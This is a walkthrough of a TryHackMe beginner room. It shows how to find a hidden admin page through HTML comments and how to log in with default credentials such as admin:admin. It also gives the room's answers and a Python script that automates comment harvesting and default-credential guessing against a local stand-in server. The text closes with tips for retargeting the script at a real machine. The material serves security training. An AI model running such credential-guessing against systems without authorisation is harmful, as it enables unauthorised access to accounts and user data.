TryHackMe “Getting Started” walkthrough
- Join this room
- Click the blue “Start AttackBox” button at the top right of the room and wait about 60 seconds for the machine's IP address to appear at the top.
You should now see something like this:
Open a new tab, enter the IP address shown at the top, and go to that page. It is very common for developers to leave comments about how the application works in the page source. Sometimes these comments include usernames, passwords, and even hidden pages that ordinary users are not supposed to know about.
A page like this should appear:
What is the name of the hidden admin page?
We now need to view the page source. Simply right-click on the page and choose “View page source” (or press Ctrl+U).
HTML comments begin with <!-- and end with -->. The browser does not render them, but they are sent to every visitor as part of the raw response, so anything a developer wrote there is public. Go through the source and identify any comments. Note that the source view shows the HTML the server returned, not the live page, and that developer notes can also sit inside inline JavaScript as // or /* ... */ comments.
Thus Ans = /test-admin
Now let’s check what is on the admin page: open a new tab and enter “machine-IP/test-admin”.
Here you will see an admin page like this:
You’ll now notice that there’s a login form on the hidden admin page. This login form may take you to the administrator portal of the BFFs platform. It is dangerous for an attacker to reach pages like this, because they typically expose privileged functionality such as:
- accessing sensitive user information (names, addresses)
- modifying users profiles
It’s very common for applications to still be using default credentials. These are the username and password pairs shipped by the vendor or a third-party component at install time, and they tend to be easy to guess. Common username and password pairs include (in the format username: password):
admin:admin
admin:password
administrator:password123
Try these default credentials to gain access to the administrator portal.
- Try admin: admin
It works!!
What is the username and password in the form username: password?
Ans : admin: admin
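The two manual steps above (read the page source for comments that leak a hidden path, then try default credentials against the login form behind it) can be scripted. The block below is an added example, not code from the room or from TryHackMe: it starts a tiny constructed stand-in for the BFFs site on localhost, with an assumed hidden path of /test-admin, assumed form field names of "username" and "password", and admin:admin as the assumed working pair, then runs the same reconnaissance against it with only the Python standard library.

```python
"""Added example: automate 'find hidden page in HTML comments, then try default creds'.
The target server below is a constructed stand-in for the room's web app; the hidden
path, form field names and valid credentials are assumptions for the demo only."""
import re
import threading
import urllib.error
import urllib.parse
import urllib.request
from html.parser import HTMLParser
from http.server import BaseHTTPRequestHandler, HTTPServer

HIDDEN_PATH = "/test-admin"            # assumption, mirrors the walkthrough
VALID_CREDS = {"admin": "admin"}       # assumption, mirrors the walkthrough

INDEX_HTML = """<html><body><h1>BFFs</h1>
<!-- TODO: remove before launch, admin page is at /test-admin -->
<p>Welcome to the site.</p></body></html>"""

LOGIN_HTML = """<html><body><form method="post" action="/test-admin">
<input name="username"><input name="password" type="password"></form></body></html>"""


class TargetHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable site: a comment leaks the admin path."""

    def log_message(self, *args):      # keep the demo quiet
        pass

    def do_GET(self):
        if self.path == "/":
            self._send(200, INDEX_HTML)
        elif self.path == HIDDEN_PATH:
            self._send(200, LOGIN_HTML)
        else:
            self._send(404, "not found")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = fields.get("username", [""])[0]
        pw = fields.get("password", [""])[0]
        if self.path == HIDDEN_PATH and VALID_CREDS.get(user) == pw:
            self._send(200, "<h1>Admin portal</h1><p>3 users registered</p>")
        else:
            self._send(401, "Invalid credentials")

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def start_target():
    """Serve the stand-in on a free localhost port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), TargetHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


class CommentCollector(HTMLParser):
    """HTMLParser calls handle_comment for every <!-- ... --> block in the source."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def find_comments(html):
    parser = CommentCollector()
    parser.feed(html)
    return parser.comments


def paths_in_comments(comments):
    """Pull out anything that looks like an absolute URL path, e.g. /test-admin."""
    found = []
    for text in comments:
        for match in re.findall(r"(?<![\w.])/[\w./-]+", text):
            found.append(match.rstrip(".,;"))   # drop trailing sentence punctuation
    return found


DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("administrator", "password123")]


def try_default_creds(base, path, creds=DEFAULT_CREDS):
    """POST each default pair to the login form; a 200 response means the pair worked."""
    for user, pw in creds:
        body = urllib.parse.urlencode({"username": user, "password": pw}).encode()
        req = urllib.request.Request(base + path, data=body, method="POST")
        try:
            with urllib.request.urlopen(req) as resp:
                if resp.getcode() == 200:
                    return (user, pw)
        except urllib.error.HTTPError as err:
            if err.code != 401:          # 401 = wrong creds, anything else is unexpected
                raise
    return None


def run(base):
    """Full chain: fetch the index, harvest comments, extract paths, try default creds."""
    html = urllib.request.urlopen(base + "/").read().decode()
    comments = find_comments(html)
    paths = paths_in_comments(comments)
    creds = try_default_creds(base, paths[0]) if paths else None
    return {"comments": comments, "paths": paths, "creds": creds}


if __name__ == "__main__":
    server, base_url = start_target()
    print(run(base_url))
    server.shutdown()
```

Against a real target you would point run() at the machine's IP instead of the local stand-in, adjust the form field names to whatever the real login form uses, and expect the success signal to be a redirect or a changed page body rather than a clean 200/401 split, so check the response content, not just the status code.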
How many users are signed up to the application?
Ans:- 3